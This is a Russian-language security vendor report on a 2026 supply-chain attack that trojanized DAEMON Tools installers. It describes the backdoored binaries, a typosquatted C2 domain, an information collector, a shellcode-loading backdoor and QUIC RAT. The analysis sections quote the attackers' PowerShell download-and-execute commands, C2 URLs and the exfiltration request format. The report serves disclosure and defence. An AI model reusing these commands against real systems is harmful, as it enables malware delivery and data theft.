Threat Response

Программное обеспечение DAEMON Tools заражено — атака на цепочку поставок продолжается с 8 апреля 2026 года

TIP

Игорь Кузнецов , Георгий Кучерин , Леонид Безвершенко , Антон Каргин

posted 05 Май 2026

updated

мин. на чтение

Что произошло?
Троянизированные бинарные файлы
Сборщик информации
Минималистичный бэкдор
QUIC RAT
Жертвы
Рекомендации и выводы
Индикаторы компрометации

Что произошло?

В начале мая 2026 года мы обнаружили, что установщики программного обеспечения DAEMON Tools для монтирования образов дисков заражены вредоносным кодом. Наш анализ показал, что троянизированные версии распространяются с 8 апреля 2026 года. В частности, заражены версии DAEMON Tools с 12.5.0.2421 до 12.5.0.2434.

На момент написания этой статьи атака на цепочку поставок все еще продолжается. В обнаруженных вредоносных имплантах мы выявили артефакты, указывающие на то, что злоумышленник, стоящий за этой атакой, говорит по-китайски. Мы связались с компанией AVB Disc Soft — разработчиком DAEMON Tools — для принятия дальнейших мер по устранению последствий атаки.

Согласно нашей телеметрии, с начала апреля произошло несколько тысяч попыток заражения через DAEMON Tools, затронувших частных лиц и организации более чем в 100 странах. Однако дальнейшее развертывание полезной нагрузки мы наблюдали лишь на десятке зараженных машин, принадлежащих организациям из сферы розничной торговли, науки, государственного управления и производства. Это указывает на то, что атака на цепочку поставок носит целенаправленный характер.

Решения «Лаборатории Касперского» обеспечивают защиту пользователей от вредоносных модулей, распространяемых в рамках атаки на цепочку поставок через DAEMON Tools.

Троянизированные бинарные файлы

Наш анализ показал, что в версиях DAEMON Tools с 12.5.0.2421 до 12.5.0.2434 злоумышленникам удалось скомпрометировать следующие бинарные файлы:

DTHelper.exe;
DiscSoftBusServiceLite.exe;
DTShellHlp.exe.

Зараженные файлы находятся в каталоге, где установлено ПО DAEMON Tools, например
C:\Program Files\DAEMON Tools Lite. Примечательно, что они имеют цифровую подпись разработчика этого ПО, компании AVB Disc Soft.

Бинарные файлы запускаются при старте компьютера. Каждый раз, когда это происходит, активируется бэкдор. Он встроен в код автозапуска, отвечающий за инициализацию среды CRT. Бэкдор работает в отдельном потоке, который используется для отправки GET-запросов на сервер:

https://env-check.daemontools[.]cc/2032716822411?s=<full computer name>/

1	https://env-check.daemontools[.]cc/2032716822411?s=<full computer name>/

Это вредоносный сервер, адрес которого создан при помощи тайпсквоттинга легитимного доменного имени daemon-tools[.]cc, используемого для загрузки DAEMON Tools. Примечательно, что согласно WHOIS, доменное имя вредоносного сервера было зарегистрировано 27 марта, примерно за неделю до начала атаки на цепочку поставок.

Фрагмент декомпилированного кода, отвечающий за формирование URL-строки GET-запроса в цикле

В ответ на отправленные запросы сервер может возвращать команду оболочки для выполнения через процесс cmd.exe. Эта команда имеет следующий вид:

cmd.exe /c powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107[.]76/','C:\Windows\Temp\.exe')"&& %TEMP%\  &&del %TEMP%\.exe"

1	cmd.exe /c powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107[.]76/','C:\Windows\Temp\.exe')"&& %TEMP%\ &&del %TEMP%\.exe"

Как можно заметить, данные shell-команды используются для загрузки и запуска исполняемой вредоносной нагрузки. Мы обнаружили несколько типов таких нагрузок, которые описываем ниже.

Сборщик информации

Первая вредоносная нагрузка, которую развертывают злоумышленники, — это сборщик информации (Information collector). Он развертывался с помощью следующей команды:

cmd.exe /c powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107.76/env_check_script','C:\Windows\Temp\envchk.exe')"&&C:\Windows\Temp\envchk.exe http://38.180.107.76/09505aca4f538bd&&del %TEMP%\envchk.exe

1	cmd.exe /c powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107.76/env_check_script','C:\Windows\Temp\envchk.exe')"&&C:\Windows\Temp\envchk.exe http://38.180.107.76/09505aca4f538bd&&del %TEMP%\envchk.exe

Файл envchk.exe (SHA1: 2d4eb55b01f59c62c6de9aacba9b47267d398fe4) представляет собой исполняемый файл .NET, используемый для сбора расширенной системной информации. Примечательно, что его код содержит строки на китайском языке. Хотя это может означать, что за этой атакой стоит китайскоязычный злоумышленник, в настоящее время мы не связываем взлом DAEMON Tools с какими-либо конкретными группами.

Скриншот кода Information collector со строками на китайском языке внутри

Данные, собираемые вредоносной нагрузкой, включают:

MAC-адрес (первый ненулевой)
Имя хоста
Доменное имя DNS
Список запущенных процессов, разделенных точкой с запятой
Список установленного программного обеспечения, разделенный точками с запятой
Язык системы

Эта информация отправляется на сервер C2, указанный в аргументе командной строки сборщика информации. Как видно из приведенной выше команды, адрес сервера —

http://38.180.107[.]76/09505aca4f538bd

1	http://38.180.107[.]76/09505aca4f538bd

Данные передаются в теле следующего POST-запроса:

a=<MAC address>&b=<hostname>&c=<DNS domain name>&d=<process list>&e=<software list>&f=<locale>

1	a=<MAC address>&b=<hostname>&c=<DNS domain name>&d=<process list>&e=<software list>&f=<locale>

Минималистичный бэкдор

Хотя мы наблюдали попытки развертывания Information collector на большом количестве зараженных машин, мы также отметили, что злоумышленники пытались доставить другую вредоносную нагрузку на небольшое количество машин (около десятка). Исходя из этого факта, мы с высокой степенью уверенности делаем вывод, что сборщик информации используется для профилирования зараженных машин, а результаты профилирования в дальнейшем используются для целенаправленного развертывания дополнительного вредоносного ПО.

Одной из дополнительных вредоносных нагрузок, которые мы наблюдали, является данный бэкдор. Его развертывали с помощью следующей команды:

cmd.exe /c powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107.76/b3593ac2edb34f4d4d','C:\Windows\Temp\cdg.exe')"&amp;&amp;powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107.76/368b1365bd9176b359','%TEMP%\cdg.tmp')"&amp;&amp;%TEMP%\cdg.exe schedsvc.dll %TEMP%\cdg.tmp first_match&amp;&amp;del %TEMP%\cdg.exe&amp;&amp;del %TEMP%\cdg.tmp"

cmd.exe /c powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107.76/b3593ac2edb34f4d4d','C:\Windows\Temp\cdg.exe')"&&powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107.76/368b1365bd9176b359','%TEMP%\cdg.tmp')"&&%TEMP%\cdg.exe schedsvc.dll %TEMP%\cdg.tmp first_match&&del %TEMP%\cdg.exe&&del %TEMP%\cdg.tmp"

Как можно заметить, эта команда используется для загрузки двух файлов: cdg.exe и cdg.tmp. Файл cdg.exe, который запускается первым, представляет собой загрузчик шелл-кода. Он открывает файл cdg.tmp, дешифрует его с помощью RC4 (с ключом, указанным в последнем аргументе, в приведенном выше примере это first_match) и запускает его в качестве шелл-кода.

Использование загрузчика шеллкода cdg.exe

Данный шеллкод представляет собой тело бэкдора. Сам бэкдор отправляет периодические POST-запросы («пульсации») на адрес:

http://38.180.107[.]76/79437f5edda13f9c066/version/check

1	http://38.180.107[.]76/79437f5edda13f9c066/version/check

Его функционал включает возможность загрузки файлов, выполнения shell-команд и запуска шеллкод-модулей в памяти.

Фрагмент декомпилированного кода минималистичного бэкдора, используемый для выполнения команд

Любопытно, что в некоторых случаях мы наблюдали развертывание минималистичного бэкдора с помощью иных команд, например, следующих:

cmd.exe /c powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107[.]76/407fbb423143f99fe0','C:\ProgramData\Microsoft\mcrypto.chiper')"&amp;&amp;powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107[.]76/07fbb423143f99fe07','$appdata\Microsoft\mcrypto.dat')"&amp;&amp;start rundll32.exe $appdata\Microsoft\mcrypto.chiper, mcrypto_clean

cmd.exe /c powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107[.]76/407fbb423143f99fe0','C:\ProgramData\Microsoft\mcrypto.chiper')"&&powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107[.]76/07fbb423143f99fe07','$appdata\Microsoft\mcrypto.dat')"&&start rundll32.exe $appdata\Microsoft\mcrypto.chiper, mcrypto_clean

cmd.exe /c powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107[.]76/407fbb423143f99fe0','C:\Windows\Temp\crypto.dll')"&amp;&amp;powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107[.]76/07fbb423143f99fe07','$appdata\Microsoft\mcrypto.dat')"&amp;&amp;start rundll32.exe %TEMP%\rypto.dll, mcrypto_clean

cmd.exe /c powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107[.]76/407fbb423143f99fe0','C:\Windows\Temp\crypto.dll')"&&powershell -NoProfile -Command "$wc=New-Object System.Net.WebClient;$wc.DownloadFile('http://38.180.107[.]76/07fbb423143f99fe07','$appdata\Microsoft\mcrypto.dat')"&&start rundll32.exe %TEMP%\rypto.dll, mcrypto_clean

Примечательно, что данные последовательности команд содержат опечатки. В первой последовательности слово «cipher» написано как «chiper», тогда как во второй пропущена буква «c» в имени файла «crypto.dll». Как видно из команды, бэкдор в данном случае не будет запущен из-за этой опечатки — что, вероятно, является индикатором того, что развертывание бэкдора осуществлялось злоумышленником вручную.

QUIC RAT

Изучив способы использования минималистичного бэкдора злоумышленниками, мы выяснили, что он применялся для развертывания более сложного импланта, который мы назвали QUIC RAT. Если минималистичный бэкдор, как мы наблюдали, развертывался на десятке машин, то QUIC RAT, по нашим данным, использовался против лишь одной организации — учебного заведения, расположенного в России.

Данный RAT написан на C++, обфусцирован с помощью техники control flow flattening и статически линкован с библиотекой WolfSSL. Также в его секции .data содержится тело легитимной библиотеки msquic.dll.

Этот бэкдор поддерживает множество протоколов коммуникации с C2, включая HTTP, UDP, TCP, WSS, QUIC, DNS и HTTP/3. Хотя его анализ всё ещё продолжается, мы установили, что QUIC RAT способен внедрять полезные нагрузки в процессы notepad.exe и conhost.exe.

Жертвы

С 8 апреля, когда была развернута первая троянская версия DAEMON Tools, мы наблюдали тысячи попыток инсталляции вредоносной нагрузки через скомпрометированные бинарные файлы. Это довольно много и указывает на широкомасштабный характер этой атаки.

Мы зафиксировали случаи заражения на устройствах, принадлежащих как частным лицам, так и организациям более чем в 100 странах и территориях, при этом большинство жертв находилось в России, Бразилии, Турции, Испании, Германии, Франции, Италии и Китае.

Анализ показывает, что 10% затронутых систем принадлежат бизнесу и организациям. В большинстве случаев на устройства доставлялась только вредоносная нагрузка, предназначенная для сбора информации. Другой, более сложный бэкдор, был обнаружен лишь на десятке компьютеров государственных, научных, производственных и розничных организаций, расположенных в России, Беларуси и Таиланде. Такой способ развертывания бэкдора на небольшой подгруппе зараженных компьютеров явно указывает на то, что атака целевая. Однако цель злоумышленников – будь то кибершпионаж или «охота на крупную дичь» — на данный момент неясна.